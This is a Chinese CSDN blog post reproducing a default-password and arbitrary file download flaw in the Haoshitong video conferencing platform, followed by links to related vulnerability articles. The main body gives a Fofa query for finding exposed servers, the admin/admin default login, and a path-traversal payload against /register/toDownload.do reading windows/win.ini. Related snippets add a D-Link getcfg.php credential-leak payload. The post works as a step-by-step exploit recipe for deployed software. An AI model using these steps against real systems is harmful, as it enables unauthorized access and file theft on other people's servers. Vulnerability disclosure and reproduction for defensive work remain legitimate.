好视通视频会议平台存在默认口令&&任意文件下载

最新推荐文章于 2024-09-13 17:30:30 发布
最新推荐文章于 2024-09-13 17:30:30 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: Web安全 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37668015/article/details/121119501
版权

0x00 产品介绍

深圳齐心好视通云计算有限公司是国内知名的云计算产品和服务提供商,隶属于齐心集团(股票代码:002301)。 公司旗下“好视通”是国内云视频会议知名品牌,连续三年在云视频会议市场占有率第一(数据来源IDC调研报告),其应用范围主要包含:远程会议,远程教育,远程培训,远程医疗,远程招聘,应急指挥等。

0x01漏洞简介

好视通视频会议平台系统存在弱口令和任意文件下载漏洞。

0x02 Fofa语法

“深圳银澎云计算有限公司”

搜索结果如下:

在这里插入图片描述

0x03 漏洞复现

1、目标站点如下所示:

在这里插入图片描述

2、默认口令 admin/admin 登录:
在这里插入图片描述

3、任意文件下载,Payload: /register/toDownload.do?fileName=…/…/…/…/…/…/…/…/…/…/…/…/…/…/windows/win.ini,效果如下:

在这里插入图片描述

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。
Fengxin..
关注
专栏目录
【漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC
失心少年
11-24 848
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!“好视通”是国内云视频会议知名品牌,拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 [5] ,专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。漏洞链接:https://127.0.0.1/register/toDownload.do?
好视通视频会议存在漏洞2021
战神/calmness的博客
11-18 3923
简介 好视通视频会议软件后台登陆处存在admin弱口令,后台可以构造url触发任意文件下载漏洞,还有xss漏洞 过程 app="好视通-视频会议“ /register/toDownload.do?fileName= 文件下载 建议 修改密码、升级软件版本 ...
好视通视频会议系统存在任意文件读取漏洞复现 [附POC]
Liyu_6618的博客
03-02 759
好视通视频会议系统存在任意文件读取漏洞复现 [附POC]
好视通视频会议平台系统漏洞复现
千寻的博客
05-21 2069
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞点fofa漏洞复现一第一步 查看登录界面第二步 使用弱口令第三步 进入系统第四步 任意文件读取摘抄 漏洞名称 弱口令 任意文件下载 漏洞编号 CNVD-2020-62437 https://www.cnvd.org.cn/flaw/show/CNVD-2020-62437 漏洞描述 好视通云会议是一款高效、便捷、低成本的网络视频会议产品,通过电脑或手机登录好视通平台, 便可快速地与全球各地团队进行实时音视频沟通,并可同步分享各类数据文档。 好视通视频会
PeiQi0#PeiQi-WIKI-Book#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-624371
07-25
银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感
tutemastev#PeiQi-WIKI-POC#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
07-25
银澎云计算 好视通视频会议系统 任意文件下载漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息漏洞影响银澎云计算 好视通
herewshow#poc#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-624371
07-25
银澎云计算 好视通视频会议系统 任意文件下载漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息漏洞影响银澎云计算 好视通
好视通云会议 upLoad2.jsp 任意文件上传漏洞复现
0xSec
11-29 1378
好视通云会议/fm/systemConfig/upLoad2.jsp接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,最终可获取服务器权限。
任意文件下载、文件读取
LainWith的博客
08-24 2087
目录简介危害脑图利用条件测试思路靶机测试安装Example 1Example 2Example 3CMS测试安装利用过程实战-1FOFA漏洞复现实战-2分析漏洞修复方案参考 简介 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不
好视通视频会议系统toDownload.do任意文件读取
weixin_43567873的博客
03-06 85
好视通视频会议系统toDownload.do接口处存在任意文件读取
2021年漏洞小结-手工自检篇
weixin_48421613的博客
12-28 1410
声明: 此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。​请阅读文末声明 D-Link-DIR路由器 账号密码信息泄露漏洞 poc: /getcfg.php SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 页面原型: 漏洞检测: 输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图 用户名以及密码就出来了​ 脚本参考如下: import requests url=inpu
2021漏洞总结3-优化版检测脚本
weixin_48421613的博客
12-21 2097
老生常谈了,此脚本仅支持检测,不支持利用,仅供给为公司资产进行自查或学习,请勿用于非法用途 此次新增检测规则如下: D-Link-DIR路由器 账号密码信息泄露​漏洞 ​CNVD-2021-16004 HIKVISION 视频编码设备接入网关 任意文件下载漏洞 更新后支持检测的漏洞如下: ​ ‘1 CVE-2021-43798 grafana任意文件读取漏洞检测’ '2 CVE-2021-36749 Apache Druid任意文件读取漏洞检测’​ ‘3 CVE-2021-37580 Apache Shen
2021年漏洞整合2+检测工具
weixin_48421613的博客
12-19 1046
2021年快结束了,又迎来了冬奥会攻防演练,此次编写的目的依然只是提供大家自学和参考,重要的是对自己公司资产的一个梳理,脚本仅支持检测,没有利用getshell功能,请大家合理合法使用,不要胡乱日站,出事不负责哦 ​ 此次脚本支持检测的内容如下: ‘1 CVE-2021-43798 grafana任意文件读取漏洞检测’ ‘2 CVE-2021-36749 Apache Druid任意文件读取漏洞检测​’ ‘3 CVE-2021-37580 Apache ShenYu身份验证绕过漏洞检测’ ‘4 CVE-20
【网络安全】漏洞挖掘之CVE-2019-9670+检测工具
等风来
09-09 240
CVE-2019-9670 是一个与相关的严重漏洞。ZCS 中的 AutoDiscover 服务存在不正确的 XML 解析处理,该漏洞可被利用来注入恶意 XML 代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行 (RCE)。Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
2024网络安全人才实战能力白皮书安全测试评估篇
最新发布
2301_76786857的博客
09-13 578
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全和社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
【网络安全】漏洞挖掘:文件上传实现Webshell
等风来
09-10 249
接着,我上传webshell.php文件,文件内容为payload,拦截请求包,将文件名修改为jpg,但回显错误,这说明服务器验证了文件的内容。
网络安全 day5 --- 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
2302_81156108的博客
09-07 1880
学习网络安全的一些心得希望对大家起到一些帮助
网络安全(黑客)——自学2024
2401_84466325的博客
09-13 937
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-09 1439
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值